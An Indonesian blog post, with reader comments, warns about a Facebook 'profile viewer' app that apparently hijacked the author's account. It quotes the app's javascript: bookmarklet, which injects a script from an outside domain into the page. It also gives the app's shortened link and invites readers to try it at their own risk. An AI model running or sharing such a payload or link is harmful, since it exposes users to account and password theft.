Read Other Articles

Waspada App Facebook Pencuri Password

Untung masih selamet gue hari ini. FB gue kena hack. Kali ini gue cuma mau kasih sedikit INFO tentang app facebook yang mencuri password. Gue gak tau persis gimana tuh app bisa ngerubah password FB. Kalo menurut gue kyaknya ad js yang buat element baru dan kemudian ngerubah tuh pwd. kata temen-temen itu sama aja kaya pencuri cookie.  Nih contoh scriptnya:


javascript:(a=(b=document).createElement('script')).src='//officialfbviewchecker.info/js.js',b.body.appendChild(a);void(0)

Pertama gue liat stat temen & kayaknya asyik tuh app. Tapi gue merasa curiga. karena rasa penasaran & ingin tahu. Yah gue klik aja tuh app. Gue ikutin tuh langkah-langkah yang lumayan simpel. Setelah itu perasaan kayak ad yang aneh. Kok layar gak redirect ke Facebook yah. malah ke iklan. Gak lama ada temen yang ngingetin (Mas Richi) "Segera Ganti Password". Perasaaan makin curiga aja nih. gue coba logout & kemudian sign in lagi. Wah kacau bener nih. FB gue gak bisa di akses. Parah....
Sial banget rasanya. Gue coba lagi, Alhamdulillah...Untungnya masih bisa di normalisasi lagi dengan sedikit usaha..

Tapi kalo temen-temen ada yang mau coba gak apa-apa. Atau mau ngebuktiin. silahkan.. Tapi resiko tanggung sendiri ya.. ^_^
Nih address appnya>> http://is.gd/YWuWeI?13601  (Link ini udah pake link shortener is.gd)




Langkah-langkah menggunakan app

App akan memberikan info melalui status kita tentang teman yang sering melihat profil FB kita

Silahkan Baca Artikel Terkait Lainnya ^_^

Jika menurut sobat artikel ini bermanfaat, silahkan vote ke Lintas Berita agar artikel ini bisa di baca oleh orang lain. ^_^ Terimakasih Telah Berkunjung.

10 komentar:

r1k4y mengatakan... Reply

wah ngeri gan skrg hacking berkeliaran :a3

Mari Berbagi mengatakan... Reply

wah harus ekstra hati2 nih, makasih atas info pentingnya. Salam

Dayas||Brothers mengatakan... Reply

@r1k4y & @Mari Berbagi: Waspada perlu bgt. :a8 Karena dunia maya milik bersama. Klo ad presidennya juga gmna ya?? :a2

Dayas||Brothers mengatakan... Reply

@r1k4y & @Mari Berbagi: Waspada perlu bgt. :a8 Karena dunia maya milik bersama. Klo ad presidennya juga gmna ya?? :a2

adekfi mengatakan... Reply

Very nice info... ^^

Dayas||Brothers mengatakan... Reply

@adekfi:Terimakasih udah berkunjung :a4
Silahkan lihat2 yang lain mba fi. :k8

KameraFoto mengatakan... Reply

wah,.. sering denger ane kasus kaya' gitu,..
FB buat promosi ajah.. :P

free coupons and samples mengatakan... Reply

Your current positions always possess a lot of really up to date info. Where do you come up with this? Just saying you are very inspiring. Thanks again

KameraFoto mengatakan... Reply

Wah bahaya neh... -_-
Makasih Infonya kawan :)

Salam Jepret
http://kamerafoto.net/

Rackmount Monitor mengatakan... Reply

It is good blog; you have a very good blog, its excellent information in its field. You have done a great job, I appreciated it and all things which you share are all good. Thanks for sharing.

Dayas||Brothers


Posting Komentar

Terima kasih Telah Berkunjung.
Blog ini Do Follow. Jadi jangan ragu untuk berkomentar. Jika mau Copy-Paste artikel boleh-boleh saja, tapi tolong sertakan sumber.
Terima Kasih ^_^_^_^